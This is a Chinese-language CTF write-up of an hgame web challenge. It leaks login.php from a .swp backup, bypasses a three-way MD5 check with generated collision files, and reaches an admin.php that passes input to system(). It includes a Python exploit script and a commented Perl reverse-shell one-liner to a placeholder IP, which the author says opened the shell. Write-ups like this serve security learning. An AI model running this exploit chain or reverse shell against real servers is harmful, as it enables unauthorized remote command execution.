很久没做题,学弟发来hgame的题,顺手warmup一下
一道md5碰撞的题
手工扫了一下备份就出来了
http://118.25.89.91:8080/question/.login.php.swp
<?php
session_start();
error_reporting(0);
if (@$_POST['username'] and @$_POST['password'] and @$_POST['code'])
{
$username = (string)$_POST['username'];
$password = (string)$_POST['password'];
$code = (string)$_POST['code'];
if (($username == $password ) or ($username == $code) or ($password == $code)) {
echo "Your input can't be the same";
}
else if ((md5($username) === md5($password)) and (md5($password) === md5($code))){
echo "Good";
$_SESSION["secret"] = 'hgame2019';
header('Location: admin.php');
exit();
} else {
echo "<pre> Invalid password</pre>";
}
}
?>
<html>
<head>
<meta charset="UTF-8">
<title>Login</title>
<link href="css/bootstrap.min.css" rel="stylesheet">
<!-- Matomo -->
<script type="text/javascript">
var _paq = window._paq || [];
/* tracker methods like "setCustomDimension" should be called before "trackPageView" */
_paq.push(['trackPageView']);
_paq.push(['enableLinkTracking']);
(function() {
var u="//118.25.89.91/piwik/";
_paq.push(['setTrackerUrl', u+'matomo.php']);
_paq.push(['setSiteId', '1']);
var d=document, g=d.createElement('script'), s=d.getElementsByTagName('script')[0];
g.type='text/javascript'; g.async=true; g.defer=true; g.src=u+'matomo.js'; s.parentNode.insertBefore(g,s);
})();
</script>
<!-- End Matomo Code -->
</head>
<body>
<div class="container">
<div id="loginbox" style="margin-top:50px;" class="mainbox col-md-6 col-md-offset-3 col-sm-8 col-sm-offset-2">
<div class="panel panel-info" >
<div class="panel-heading">
<div class="panel-title">Sign In</div>
</div>
<div style="padding-top:30px" class="panel-body" >
<div style="display:none" id="login-alert" class="alert alert-danger col-sm-12"></div>
<form id="loginform" class="form-horizontal" role="form" method="post" action="">
<div style="margin-bottom: 25px" class="input-group">
<span class="input-group-addon"><i class="glyphicon glyphicon-user"></i></span>
<input id="login-username" type="text" class="form-control" name="username" value="" placeholder="username" autocomplete="off">
</div>
<div style="margin-bottom: 25px" class="input-group">
<span class="input-group-addon"><i class="glyphicon glyphicon-lock"></i></span>
<input id="login-password" type="password" class="form-control" name="password" placeholder="password" autocomplete="off">
</div>
<div style="margin-bottom: 25px" class="input-group">
<span class="input-group-addon"><i class="glyphicon glyphicon-qrcode"></i></span>
<input id="login-username" type="text" class="form-control" name="code" value="" placeholder="secret code" autocomplete="off">
</div>
<div class="input-group">
<div class="checkbox">
<label>
<input id="login-remember" type="checkbox" name="remember" value="1">Remember me
</label>
</div>
</div>
<div style="margin-top:10px" class="form-group">
<div class="col-sm-12 controls">
<input type="submit" name="login" value="Login" class="btn btn-success"/>
</div>
</div>
</form>
</div>
</div>
</div>
</div>
<script src="js/jquery.min.js"></script>
<script src="js/bootstrap.min.js"></script>
</body>
</html>
几个===展现出了这道题的硬核0rz
因为string强制类型转换,所以不可能用数组之流绕过。
然后只好找了几篇文章慢慢看
发现有人提到hashclash这个利用王小云的论文所写出来的md5碰撞工具,于是下载下来,但是这个工具存在几个问题,只能产生两个hash相同的文件,而这个地方需要三个,因此接下来的目标就是找到可以以这种方式产生三个及以上文件的工具
然后找到了这个
thereal1024/python-md5-collision
大致翻了下文档 这个gen_coll_test.py可以生成大约两百个md5相同的文件,那就解决问题了
直接上手写脚本
# -*- coding:utf-8 -*-
# __Author__:berTrAM
import sys
import requests
url = "http://118.25.89.91:8080/question/login.php"
admin_url = "http://118.25.89.91:8080/question/admin.php"
username = open('out_test_000.txt','r').read()
password = open('out_test_001.txt','r').read()
code = open('out_test_002.txt','r').read()
data = {'username':username,'password':password,'code':code,'remember':'1','login':'Login'}
s = requests.Session()
rs = s.post(url,data=data)
s.get(admin_url)
data2 = {'command':sys.argv[1],'submit':'提交'}
rs2 = s.post(admin_url,data=data2)
print rs2.content[rs2.content.find("Result is :")+11:]
#perl -e 'use Socket;$i="x.x.x.x";$p=9999;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
写完脚本第一部分后,发现后台直接给了shell
顺手cat admin.php
拖下源码
<?php
session_start();
error_reporting(0);
?>
<head>
<!-- Matomo -->
<script type="text/javascript">
var _paq = window._paq || [];
/* tracker methods like "setCustomDimension" should be called before "trackPageView" */
_paq.push(['trackPageView']);
_paq.push(['enableLinkTracking']);
(function() {
var u="//118.25.89.91/piwik/";
_paq.push(['setTrackerUrl', u+'matomo.php']);
_paq.push(['setSiteId', '1']);
var d=document, g=d.createElement('script'), s=d.getElementsByTagName('script')[0];
g.type='text/javascript'; g.async=true; g.defer=true; g.src=u+'matomo.js'; s.parentNode.insertBefore(g,s);
})();
</script>
<!-- End Matomo Code -->
</head>
<?php
if ($_SESSION["secret"] === 'hgame2019')
{
?>
<form action="" method="post">
Private Terminal <input type="text" name="command"><input type="submit" name="submit">
</form>
<?php
if($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['submit'])){
$cmd = (string)$_POST['command'];
echo "<p>The Command is : $cmd </p>";
echo "</br>";
$cmd = str_replace("flag",'none',$cmd);
echo "<p>Result is :";system($cmd); "</p>";
}
}
else {
echo "<script>alert('Login First')</script>";
header('Location: login.php');
exit();
}
?>
发现不能直接读flag,虽用perl反弹出shell
getflag
此处评论已关闭